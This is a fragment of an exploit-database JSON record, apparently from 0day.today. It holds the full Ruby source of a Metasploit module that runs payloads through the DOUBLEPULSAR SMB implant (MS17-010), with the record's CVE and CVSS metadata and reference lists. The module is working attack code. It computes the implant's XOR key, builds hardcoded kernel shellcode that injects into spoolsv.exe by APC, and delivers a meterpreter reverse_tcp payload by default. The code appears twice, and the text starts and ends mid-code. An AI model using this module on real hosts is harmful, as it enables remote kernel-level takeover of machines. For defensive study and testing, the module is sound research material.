body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n 
pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack(\"S<\")\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" +\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" +\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" +\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" +\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" +\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" +\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" +\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" +\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" +\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" +\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" +\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" +\r\n 
\"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" +\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" +\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" +\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" +\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" +\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" +\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" +\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" +\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" +\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" +\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" +\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" +\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" +\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" +\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" +\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" +\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" +\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" +\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" +\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" +\r\n 
\"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" +\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" +\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" +\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" +\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" +\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" +\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" +\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" +\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" +\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" +\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" +\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" +\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" +\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" +\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" +\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-10-24] #"}, "lastseen": "2021-10-23T22:15:43", "differentElements": ["sourceData"], "edition": 54}, {"bulletin": {"id": "1337DAY-ID-33313", "vendorId": null, "hash": "75b5d499811beffce73aa223da30e103", "type": "zdt", "bulletinFamily": "exploit", "title": "DOUBLEPULSAR - Payload Execution and Neutralization Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as 
popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2019-10-04T00:00:00", "modified": "2019-10-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33313", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0145", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0148", "CVE-2017-0144"], "immutableFields": [], "lastseen": "2021-10-25T00:17:11", "history": [], "viewCount": 94, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "700099.PRM", "700059.PRM", "MS17-010.NASL"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41987", "EDB-ID:41891", "EDB-ID:43970"]}, {"type": 
"zdt", "idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33895", "1337DAY-ID-29702", "1337DAY-ID-27613", "1337DAY-ID-27802"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:146236", "PACKETSTORM:142548", "PACKETSTORM:156196"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND"]}, {"type": "seebug", "idList": ["SSV:92964", "SSV:92952"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0143", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96709", "SMNTC-96704", "SMNTC-96703", "SMNTC-96705", "SMNTC-96707", "SMNTC-96706"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", 
"TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "threatpost", "idList": ["THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41"]}, {"type": "mmpc", "idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:FECB9309EE6D84976C56C12C05F1CD02"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0145", "MS:CVE-2017-0143", "MS:CVE-2017-0144"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:9EF85E0CE1D118D27911357B1C516074"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-10-25T00:17:11", "rev": 2}, "score": {"value": 7.7, "vector": "NONE", "modified": "2021-10-25T00:17:11", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33313", "sourceData": "##\r\n# This 
module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'DOUBLEPULSAR Payload Execution and Neutralization',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14',\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => 
{\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload', {}],\r\n ['Neutralize implant', {}]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n },\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_SAFE],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? 
ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack('V').first\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n vprint_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n vprint_good(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n vprint_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n vprint_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable 
to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << Rex::Text.rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n 
simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n 
pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack(\"S<\")\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" +\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" +\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" +\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" +\r\n 